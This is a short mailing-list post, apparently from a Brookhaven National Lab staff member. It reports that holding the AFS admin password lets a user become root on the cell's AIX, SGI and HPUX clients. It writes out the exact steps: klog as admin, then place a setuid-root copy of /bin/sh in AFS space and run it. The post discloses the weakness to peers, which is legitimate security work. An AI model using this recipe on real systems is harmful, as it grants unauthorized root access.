Hi all,
At Brookhaven National lab, we just found something very interseting.
That is if you know AFS admin password, you can become root on any
AFS client machines in the cell (except Solaris machines). We did the following tests
on AIX, SGI, HPUX and we succeded. Solaris somehow is smart enough to stop the
break-in.
login as user on any AFS client machine belong to your cell
% klog admin
% cd /afs/<your-cell>
% cp /bin/sh .
% chown root sh
% chmod 4755 sh
% ./sh
% whoami
root
In other words, If I am AFS administrator, I can be root on any AFS client machines
belong to my cell. Is it cool ?
Tom Nguyen
